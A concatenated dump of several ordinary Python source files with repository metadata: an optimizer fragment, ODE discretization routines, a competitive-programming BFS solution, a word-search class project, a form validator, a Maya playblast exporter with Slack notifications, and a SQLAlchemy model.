amsgrad,
):
grad.add_(weight_decay, point)
grad = manifold.proju(point, grad)
exp_avg.mul_(betas[0]).add_(1 - betas[0], grad)
exp_avg_sq.mul_(betas[1]).add_(1 - betas[1], manifold.inner(point, grad))
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(eps)
else:
denom = exp_avg_sq.sqrt().add_(eps)
denom = manifold.broadcast_scalar(denom)
step.add_(1)
bias_correction1 = 1 - betas[0] ** step.type_as(betas)
bias_correction2 = 1 - betas[1] ** step.type_as(betas)
step_size = lr * bias_correction2.sqrt_().div_(bias_correction1)
# copy the state, we need it for retraction
# get the direction for ascend
direction = exp_avg / denom
# transport the exponential averaging to the new point
new_point, exp_avg_new = manifold.retr_transp(
point, direction, -step_size, exp_avg
)
point.set_(new_point)
exp_avg.set_(exp_avg_new)
def stabilize_group(self, group):
with torch.no_grad():
for p in group["params"]:
if not isinstance(p, (ManifoldParameter, ManifoldTensor)):
continue
state = self.state[p]
manifold = p.manifold
exp_avg = state["exp_avg"]
p.set_(manifold.projx(p))
exp_avg.set_(manifold.proju(p, exp_avg))
def _sanitize_group(self, group):
group = group.copy()
if isinstance(group["lr"], torch.Tensor):
group["lr"] = group["lr"].item()
if isinstance(group["weight_decay"], torch.Tensor):
group["weight_decay"] = group["weight_decay"].item()
if isinstance(group["eps"], torch.Tensor):
group["eps"] = group["eps"].item()
if isinstance(group["betas"], torch.Tensor):
group["betas"] = group["betas"][0].item(), group["betas"][1].item()
return group
| UTF-8 | Python | false | false | 8,871 | py | 18 | radam.py | 13 | 0.451697 | 0.447526 | 0 | 222 | 38.959459 | 104 |
Jonas-Nicodemus/phdmd | 9,328,669,010,422 | c8138715d8c03daff0b6d903ee64975bc2c17db8 | 2f3c413ff9678ddc4aff0fb182c402c4466723ea | /src/discretization/discretization.py | c510f58af109632c0a96d60dde89be049c55c035 | [
"MIT"
]
| permissive | https://github.com/Jonas-Nicodemus/phdmd | 208b43ad3500713fdfe1b1244d891cf2c4b83672 | 6b72e840cd71fb22422a01c5550225996bcd1eff | refs/heads/main | 2023-04-14T06:42:32.177808 | 2023-02-10T14:52:53 | 2023-02-10T14:52:53 | 483,152,686 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from tqdm import tqdm
from pymor.algorithms.to_matrix import to_matrix
from pymor.models.iosys import LTIModel, PHLTIModel
def discretize(lti, U, T, x0, method='implicit_midpoint', return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system.
Parameters
----------
lti : pymor.models.iosys.PHLTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
method : str
The method to use for the discretization. Available methods are:
'implicit_midpoint', 'explicit_euler', 'explicit_midpoint', 'scipy_solve_ivp'.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
assert isinstance(lti, PHLTIModel) or isinstance(lti, LTIModel)
if isinstance(lti, PHLTIModel):
lti = lti.to_lti()
match method:
case 'implicit_midpoint':
return implicit_midpoint(lti, U, T, x0, return_dXdt)
case 'explicit_euler':
return explicit_euler(lti, U, T, x0, return_dXdt)
case 'explicit_midpoint':
return explicit_midpoint(lti, U, T, x0, return_dXdt)
case _:
return scipy_solve_ivp(lti, U, T, x0, method, return_dXdt)
def implicit_midpoint(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the implicit midpoint method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
if not isinstance(U, np.ndarray):
U = U(T)
if U.ndim < 2:
U = U[np.newaxis, :]
delta = T[1] - T[0]
M = to_matrix(lti.E - delta / 2 * lti.A)
AA = to_matrix(lti.E + delta / 2 * lti.A)
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
U_midpoint = 1 / 2 * (U[:, i] + U[:, i + 1])
X[:, i + 1] = np.linalg.solve(M, AA @ X[:, i] + delta * B @ U_midpoint)
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def explicit_euler(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the explicit Euler method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
if not isinstance(U, np.ndarray):
U = U(T)
if U.ndim < 2:
U = U[np.newaxis, :]
delta = T[1] - T[0]
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
X[:, i + 1] = X[:, i] + delta * np.linalg.solve(E, A @ X[:, i] + B @ U[:, i])
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def explicit_midpoint(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the explicit midpoint method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
if not isinstance(U, np.ndarray):
U = U(T)
if U.ndim < 2:
U = U[np.newaxis, :]
delta = T[1] - T[0]
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
X_ = X[:, i] + delta * np.linalg.solve(E, A @ X[:, i] + B @ U[:, i])
X[:, i + 1] = X[:, i] + delta * np.linalg.solve(E, A @ X_ + B @ (1 / 2 * (U[:, i] + U[:, i + 1])))
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def scipy_solve_ivp(lti, u, T, x0, method='RK45', return_dXdt=False):
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
U = u(T)
if U.ndim < 2:
U = U[np.newaxis, :]
from scipy.integrate import solve_ivp
def f(t, x, u):
return np.linalg.solve(E, A @ x + B @ u(t))
sol = solve_ivp(f, (T[0], T[-1]), x0, t_eval=T, method=method, args=(u,))
X = sol.y
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
| UTF-8 | Python | false | false | 6,847 | py | 31 | discretization.py | 18 | 0.555426 | 0.547831 | 0 | 247 | 26.720648 | 106 |
Sunghwan-DS/TIL | 7,705,171,360,963 | 4855cc702d440850fe157a192dd77f52e2cbc25a | 8051c8863119bc2b5e5b3107ce9c47ab12616e63 | /Python/BOJ/BOJ_17142.py | 9989d49b27554e20dc7966a0856536b0987a92e0 | []
| no_license | https://github.com/Sunghwan-DS/TIL | c01f6f4c84f3e2d85e16893bbe95c7f1b6270c77 | 6d29f6451f9b17bc0acc67de0e520f912dd0fa74 | refs/heads/master | 2021-07-11T16:23:58.077011 | 2021-03-12T02:28:26 | 2021-03-12T02:28:26 | 234,990,431 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 2020.03.21
# 22:00 ~ 22:32
# BFS 구현
# 시간:1004ms, 코드 길이:1810B
def BFS(virus):
global ans
visited = [[False] * N for _ in range(N)]
q = virus[:]
for y, x in q:
visited[y][x] = True
final_cnt = 2500
res = 0
cnt = 0
stop = False
while q:
cnt += 1
for _ in range(len(q)):
y, x = q.pop(0)
for dir in range(4):
ny = y + dy[dir]
nx = x + dx[dir]
if 0 <= ny <= N-1 and 0 <= nx <= N-1 and not visited[ny][nx] and arr[ny][nx] != 1:
q.append((ny, nx))
visited[ny][nx] = True
if arr[ny][nx] == 0:
res += 1
if res == need:
final_cnt = cnt
stop = True
break
if stop:
break
if stop:
break
stop = False
for i in range(N):
for j in range(N):
if not visited[i][j] and arr[i][j] == 0:
stop = True
break
if stop:
break
else:
ans = min(ans, final_cnt)
def make_virus(idx, virus):
if len(virus) == M:
BFS(virus)
return
if idx == len(virus_co):
return
virus.append(virus_co[idx])
make_virus(idx + 1, virus)
virus.pop()
make_virus(idx + 1, virus)
dy = [-1, 0, 1, 0]
dx = [0, 1, 0, -1]
N, M = map(int,input().split())
arr = [list(map(int,input().split())) for _ in range(N)]
need = 0
virus_co = []
for i in range(N):
for j in range(N):
if arr[i][j] == 2:
virus_co.append((i, j))
elif arr[i][j] == 0:
need += 1
if need == 0:
print(0)
exit()
ans = 2500
make_virus(0, [])
if ans == 2500:
print(-1)
else:
print(ans) | UTF-8 | Python | false | false | 1,890 | py | 305 | BOJ_17142.py | 286 | 0.409819 | 0.374066 | 0 | 90 | 19.833333 | 98 |
roshni-v/cpe101-word-finder-project | 6,485,400,636,445 | bec23084515dab9e3420d461771c9a23541724a9 | 0d45c828de90ae0b18af396021efa2270af3aacf | /wordFinderFuncs.py | 39075fecd97870d9619ea928c33b1fe57633a6fa | []
| no_license | https://github.com/roshni-v/cpe101-word-finder-project | ff2cb8f9cb60aece1c3730fc94b7f050f4cedfbc | 112c3c4646bf42a37a9b3ce4b87f9910209a16c7 | refs/heads/main | 2023-04-24T19:39:40.255653 | 2021-05-07T10:59:07 | 2021-05-07T10:59:07 | 365,204,252 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Project 3 Word Finder
#
# Name: Roshni Vakil
# Instructor: Dr. S. Einakian
# Section: 9/10
#creates a point object from two provided coordinates
#int + int --> Point
class Point:
def __init__(self, row, column):
self.__row = row
self.__column = column
def __repr__(self):
return "row: " + str(self.__row) + " column: " + str(self.__column)
def getRow(self):
return self.__row
def getColumn(self):
return self.__column
def setRow(self, value):
self.__row = value
def setColumn(self, value):
self.__column = value
#purpose: gets input for puzzle
#None --> list
def getPuzzleList():
longPuzzle = input()
rows, cols = (10, 10)
puzzle = []
for i in range(cols):
col = []
puzzle.append(col)
for j in range(rows):
col.append(longPuzzle[10*i+j])
return(puzzle)
#purpose: gets input for puzzle
#None --> list
#def getPuzzle():
#1) asks the user for input for puzzle
#2) stores it in a 100 character string
#3) creates a new empty 2D list
#4) takes the first 10 characters from the 100 character string, and adds it to a string representing line 1
#5) adds that string to the 2D list
#6) repeat steps 4-5 for every following set of 10 characters in the 100 character string
#6) return that 2D list
#purpose: gets input for puzzle
#list --> None
def printPuzzleString(twoDList: list):
print("Puzzle: \n")
for list in range(len(twoDList)):
for letter in twoDList[list]:
print(letter, end = "")
print()
#purpose: gets an input list for words we are searching for
#None --> list
def getWords():
words = input()
listOfWords = words.split()
return listOfWords
#purpose: gets an input list for words we are searching for
#None --> list
#def getWords():
#1) create an empty place (list) to store the words that we are going to search for
#2) asks the user if they have a word they are searching for
#2.1) if the answer is no, give option to end program
#2.2) if yes, ask again
#3) add this to the empty list of words we are searching for
#4) asks the user of they have any other words they are looking for
#4.1) if the answer is yes, add this to the empty list of values we are searching for and repeat step 4
#4.2) if no, return this list
#purpose: checks for given word spelled forward
#list + String --> Point
def forward_and_basis_for_other_functions(puzzleList: list, word: str):
totalCount = 0
for i in range(len(puzzleList)):
count = 0
failed = "n"
for j in range(len(puzzleList[0])):
totalCount += 1
if failed =="y":
j -= 1
if puzzleList[i][j].lower() == word[count].lower():
if count == 0:
returnVal = Point(i, j)
count += 1
elif puzzleList[i][j].lower() != word[count].lower() and count > 0:
count = 0
failed = "y"
if count == len(word):
return returnVal
return "N"
#purpose: checks for given word spelled forward
#list + String --> Point
#def forward(list, word):
#1) get the length of the given word
#2) while the word is not found, do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible in that line
#2.1.1)if the current character matches the current character of the given word (character that starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without re-storing start location
#2.1.1.3.1) if at any point the word is found return start location
# 2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one interation of 2.1.1.
# 2.1.3) else, move one unit forward in the puzzle line and repeat 2.1
#2.2) move to next line and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled backward
#list + String --> Point
def backward(puzzleList: list, word: str):
backwardList = []
for i in range(len(puzzleList)):
backwardList.append([])
for j in range(len(puzzleList[i]) - 1, -1, -1):
backwardList[i].append(puzzleList[i][j])
temp = forward_and_basis_for_other_functions(backwardList, word)
if temp != "N":
temp.setColumn(9 - temp.getColumn())
return temp
#purpose: checks for given word spelled backward
#list + String --> Point
#def backward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible in that line
#2.1.1) if the current character matches the current character of the given word (character that starts at length - 1 and then decrements):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one interation of 2.1.1.
#2.1.3) else, move one unit forward in the puzzle line and repeat 2.1
#2.2) move to next line and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled upward
#list + String --> Point
def upward(puzzleList: list, word: str):
upwardList = []
for i in range(len(puzzleList[0])):
upwardList.append([])
for j in range(len(puzzleList) - 1, -1, -1):
upwardList[i].append(puzzleList[j][i])
temp = forward_and_basis_for_other_functions(upwardList, word)
if temp != "N":
newRow = temp.getColumn()
temp.setColumn(temp.getRow())
temp.setRow(abs(9-newRow))
return temp
#purpose: checks for given word spelled upward
#list + String --> Point
#def upward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character at a given index value for each string of 10 letters (start at the 0th index, then 1st, etc) where it is possible that the word could be found below
#2.1.1) if the current character matches the current character of the given word (character that starts at length - 1 an then decrements):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one interation of 2.1.1.
#2.1.3) else, move one unit to the next line in the puzzle and repeat 2.1
#2.2) move to next index value and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled downward
#list + String --> Point
def downward(puzzleList: list, word: str):
downwardList = []
for i in range(len(puzzleList[0])):
downwardList.append([])
for j in range(len(puzzleList)):
downwardList[i].append(puzzleList[j][i])
temp = forward_and_basis_for_other_functions(downwardList, word)
if temp != "N":
newRow = temp.getColumn()
temp.setColumn(temp.getRow())
temp.setRow(newRow)
return temp
#purpose: checks for given word spelled downward
#list + String --> Point
#def downward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character at a given index value for each string of 10 letters (start at the 0th index, then 1st, etc) where it is possible that the word could be found below
#2.1.1) if the current character matches the currrent character of the given word (starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one interation of 2.1.1.
#2.1.3) else, move one unit to the next line in the puzzle and repeat 2.1
#2.2) move to next index value and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled diagonally
#list + String --> Point
def diagonally(puzzleList: list, word: str):
diagonalList = []
diagonalList.append([])
for i in range(len(puzzleList)):
for j in range(len(puzzleList[i])):
if i == j:
diagonalList[0].append(puzzleList[i][j])
temp = forward_and_basis_for_other_functions(diagonalList, word)
if temp != "N":
temp.setRow(temp.getColumn())
else:
temp = backward(diagonalList, word)
if temp != "N":
temp.setRow(temp.getColumn())
return temp
#purpose: checks for given word spelled diagonally
#list + String --> Point
#def diagonally(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible diagonally (not enough characters left to the right)
#2.1.1) if the current character matches the current character of the given word (starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in the given word and the next character on the next line in the puzzle (move one unit down diagonally)
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with the character 1 unit to the right of the location value
#7.2.2) move to next line and repeat all of 2.1
#7.2.3) if we finish without finding the word return None location
| UTF-8 | Python | false | false | 11,361 | py | 2 | wordFinderFuncs.py | 2 | 0.621072 | 0.59405 | 0 | 250 | 44.436 | 190 |
groundnuty/lw-daap | 9,174,050,187,945 | afd48d9a51e2f0622c9d037fde86df63362e5352 | b9cd85504a84ef99f7c96784ab0fc67fb1921c3f | /lw_daap/modules/deposit/validation_utils.py | 77d8aa7bd67c698115298625ce8d9cc939d5bc36 | []
| no_license | https://github.com/groundnuty/lw-daap | 28bed75257e60c51e3bde47385ad95efdc59e52b | e84cb33310506fcdab1dcdb1e8bd425d44435fbe | refs/heads/master | 2021-01-11T00:35:48.649454 | 2016-10-11T20:52:42 | 2016-10-11T20:52:42 | 70,513,173 | 0 | 0 | null | true | 2016-10-10T17:42:45 | 2016-10-10T17:42:44 | 2016-01-21T20:26:25 | 2016-07-08T12:22:19 | 6,433 | 0 | 0 | 0 | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Lifewatch DAAP.
# Copyright (C) 2015 Ana Yaiza Rodriguez Marrero.
#
# Lifewatch DAAP is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lifewatch DAAP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Lifewatch DAAP. If not, see <http://www.gnu.org/licenses/>.
"""Validation functions."""
from wtforms_components import DateRange
class StartEndDate(DateRange):
"""Require start date before end date."""
def __init__(self, min_from=None, max_from=None, **kwargs):
super(StartEndDate, self).__init__(**kwargs)
self.min_from = min_from
self.max_from = max_from
def __call__(self, form, field):
if self.min_from:
self.min = getattr(form, self.min_from).data
if self.max_from:
self.max = getattr(form, self.max_from).data
super(StartEndDate, self).__call__(form, field)
| UTF-8 | Python | false | false | 1,349 | py | 228 | validation_utils.py | 115 | 0.690141 | 0.685693 | 0 | 37 | 35.459459 | 72 |
FluffyFu/Leetcode | 12,902,081,794,360 | 0d0eaff62bb314f73da77019bfdcc154228b6455 | 538fd58e4f7d0d094fd6c93ba1d23f78a781c270 | /102_binary_tree_level_order_traversal/solution.py | 0914b40ee7bb5251e602984ccb4b757ffab0c459 | []
| no_license | https://github.com/FluffyFu/Leetcode | 4633e9e91e493dfc01785fd379ab9f0788726ac1 | 5625e6396b746255f3343253c75447ead95879c7 | refs/heads/master | 2023-03-21T08:47:51.863360 | 2021-03-06T21:36:43 | 2021-03-06T21:36:43 | 295,880,151 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import List
from queue import Queue
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
result = []
if not root:
return result
q = Queue()
q.put(root)
while not q.empty():
level_len = q.qsize()
level_res = []
for _ in range(level_len):
node = q.get()
if node.left:
q.put(node.left)
if node.right:
q.put(node.right)
level_res.append(node.val)
result.append(level_res)
return result
| UTF-8 | Python | false | false | 784 | py | 475 | solution.py | 474 | 0.479592 | 0.478316 | 0 | 34 | 22.029412 | 60 |
ljhahne/ARNe | 3,032,246,931,477 | 1b2be40a9c415aa6c5c46958e2c3b9972c5be758 | 6398c22bcb07a11a783fa93e8c7ea8a60f2b3322 | /models/WReNTransformer.py | 3b1b1d64f81283a7a46af1120a74576f71a3d4ef | []
| no_license | https://github.com/ljhahne/ARNe | 4ce60e30684f22356709d573935d0a7a91e6dfcf | c438d0df31fd1536291ccc8ba90b23edeb8c2af0 | refs/heads/main | 2023-07-16T18:09:55.495323 | 2021-08-24T19:17:52 | 2021-08-24T19:17:52 | 398,060,141 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
from .Transformer import Encoder
class WReNTransformer(nn.Module):
def __init__(self, config_transformer, N, d_classifier=[256, 256, 256, 13], use_delimiter=False,
old_transformer_model=False):
super().__init__()
self.N = N
self.d_model = config_transformer["d_model"]
self.n_labels = d_classifier[-1]
self.use_delimiter = use_delimiter
# should only be set by function
self.attention_maps = False
if use_delimiter:
self.N += 1
self.encoder_transformer = Encoder(
self.N,
d_model=config_transformer["d_model"],
n_layers=config_transformer["n_layers"],
h=config_transformer["h"],
d_ff=config_transformer["d_ff"],
d_v=config_transformer["d_v"],
d_k=config_transformer["d_k"],
d_q=config_transformer["d_q"],
dropout_dot_product=config_transformer["dropout"],
dropout_fc=config_transformer["dropout"],
dropout_pos_ff=config_transformer["dropout"],
old_transformer_model=old_transformer_model
)
d_classifier[0] = config_transformer["d_model"]
theta_features = [config_transformer["d_model"] for i in range(5)]
self.g_theta_transformer = nn.Sequential(*[layer for i in range(len(theta_features) - 1) for layer in
[nn.Linear(in_features=theta_features[i],
out_features=theta_features[i + 1]),
nn.ReLU()]])
layers = [nn.Linear(in_features=d_classifier[0], out_features=d_classifier[1]), nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(in_features=d_classifier[1], out_features=d_classifier[2]), nn.ReLU(),
nn.Linear(in_features=d_classifier[2], out_features=d_classifier[3])
]
self.classifier_transformer = nn.Sequential(*layers)
def get_attention_maps_data(self):
attentions = self.encoder_transformer.get_attention_maps_data()
return attentions
def return_attention_maps(self, state):
self.attention_maps = state
self.encoder_transformer.return_attention_maps(state)
def forward(self, chi, i_iteration=None):
"""
encoded_panel_sequence --> encoder_transformer --> MLP each sequence element + sum them up --> classifier --> [RETURN] logits
:return: logits
"""
if self.attention_maps == True:
self.encoder_transformer.set_iteration(i_iteration)
x = self.encoder_transformer(chi)
assert (self.N, self.d_model) == x.shape[1:]
x = torch.sum(self.g_theta_transformer(x), dim=1)
assert (self.d_model,) == x.shape[1:]
logits = self.classifier_transformer(x)
assert (self.n_labels,) == logits.shape[1:]
return logits | UTF-8 | Python | false | false | 3,032 | py | 18 | WReNTransformer.py | 15 | 0.568602 | 0.559037 | 0 | 79 | 37.392405 | 133 |
sysrnd/Maya_Animacion_PlayblastExporter | 17,858,474,024,541 | b639549d820ce4938ef7043cca95f3d1db1322eb | 1ae93fdcd8446509c3c722df70e3332443c4ffb3 | /playblastExport_Core/playblastExportBridge.py | 967e914dbd4d963c87a5b4c9d915ebb24a17fa0d | []
| no_license | https://github.com/sysrnd/Maya_Animacion_PlayblastExporter | 571fa57707b48f9c5c228fc6752df8d74bfd7eb5 | 217e4dbbb91827baa34fbed389a8b854ef8d88f2 | refs/heads/master | 2021-09-04T22:14:53.863115 | 2018-01-22T16:16:52 | 2018-01-22T16:16:52 | 113,534,142 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Modules.Qt import QtCore
import Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore
reload(Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore)
from Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore import playblastExport
import Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages
reload(Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages)
from Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages import Slack
import os
class BridgeActions():
def __init__(self, window_interface):
"""
Start Interfaces control.
This method creates buttons to analize what actions
will evaluate the class.
"""
self.master_window = window_interface
# Create buttons identifiers main window
self.txt_artistName = window_interface.txt_artistName
self.txt_path = window_interface.txt_path
self.btn_accept = window_interface.btn_accept
self.btn_path = window_interface.btn_path
self.rdbtn_local = window_interface.rdbtn_local
self.rdbtn_server = window_interface.rdbtn_server
# Make buttons connections
self.rdbtn_local.setChecked(True)
self.btn_accept.clicked.connect(self.accept)
self.btn_path.clicked.connect(self.path)
self.rdbtn_local.toggled.connect(self.changeRadioSignal)
self.rdbtn_server.toggled.connect(self.changeRadioSignal)
self.playblast = playblastExport()
self.slack = Slack()
self.path = self.playblast.getDocsPath()
self.autoComplete()
def accept(self):
"""
"""
txt = self.txt_artistName.text()
path = self.txt_path.text()
self.writeLocalInfo(self.path + '/artist.txt', txt)
name = self.playblast.fileName()
if self.rdbtn_server.isChecked():
if path.find('Z:/') != -1 or path.find('//master') != -1:
self.playblast.main(txt, path)
self.slack.MessageSlack(Message = 'Se ha salvado el playblast *' + name + '* del animador *' + txt + '*.\n En la ruta: *' + path +'*', channel = 'playblasts')
#self.slack.MessageSlack(Message = 'ya no funciona esta chingadera', channel = 'tickets_test')
else:
self.playblast.warnings(txt)
else:
self.playblast.main(txt, path)
def path(self):
local = self.rdbtn_local.isChecked()
path = self.playblast.path()
if local:
self.txt_path.setText(path)
self.writeLocalInfo(self.path + '/localpath.txt', self.txt_path.text())
else:
self.txt_path.setText(path)
self.writeLocalInfo(self.path + '/serverpath.txt', self.txt_path.text())
def autoComplete(self):
self.readLocalInfo(self.path + '/localpath.txt', self.txt_path)
self.readLocalInfo(self.path + '/artist.txt', self.txt_artistName)
def readLocalInfo(self, file, txt):
if os.path.exists(file + '.txt'):
with open(file + '.txt' ,'r') as f:
data = f.read()
txt.setText(data)
return True
else:
return False
def writeLocalInfo(self, file, txt):
with open(file + '.txt' ,'w') as f:
data = f.write(txt)
def changeRadioSignal(self):
if self.rdbtn_local.isChecked():
self.readLocalInfo(self.path + '/localpath.txt', self.txt_path)
else:
self.readLocalInfo(self.path + '/serverpath.txt', self.txt_path)
| UTF-8 | Python | false | false | 3,787 | py | 9 | playblastExportBridge.py | 7 | 0.623713 | 0.623185 | 0 | 175 | 20.577143 | 174 |
adorsk-noaa/georefine | 10,840,497,469,544 | 93d13ac19bcbc2b24133cab3d8f97b5b1ea9ad22 | a77776b362c361933a02f91692b0ae112a6ca33c | /georefine/app/projects/models.py | 8205a912c2b2f2ca9b485238eb210e090ec41e8e | []
| no_license | https://github.com/adorsk-noaa/georefine | 3114a66a6eaafe8ab68df8e75ec16f0286e68c6d | 237ab00be4b028e90fccdf82cc15c5cd88fe3a34 | refs/heads/master | 2021-01-25T12:02:10.909344 | 2013-03-13T19:58:26 | 2013-03-13T19:58:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from georefine.app import db
from sqlalchemy import (Table, Column, Integer, String, Text, ForeignKey,
PickleType)
from sqlalchemy.orm import mapper, relationship, backref
class Project(object):
def __init__(self, id=None, name=None, schema=None, data_dir=None,
static_dir=None, static_url=None):
self.id = id
self.name = name
self.schema = schema
self.data_dir = data_dir
self.static_dir = static_dir
self.static_url = static_url
project_table = Table('project_projects', db.metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('schema', PickleType),
Column('data_dir', String),
Column('db_uri', String),
Column('static_dir', String),
Column('static_url', String),
)
mapper(Project, project_table)
| UTF-8 | Python | false | false | 891 | py | 62 | models.py | 53 | 0.606061 | 0.606061 | 0 | 27 | 32 | 73 |
wjs018/PySceneDetect | 17,781,164,642,933 | a6ce56c61a672fe7002a6192419ced759ba7f853 | 7c8c7245e87fec996b2b956ad0438b0d87a45aa4 | /scenedetect/platform.py | 4f3dae9cafe60107fa9a3a16f7a5e8b9501f3f93 | [
"BSD-3-Clause",
"Python-2.0"
]
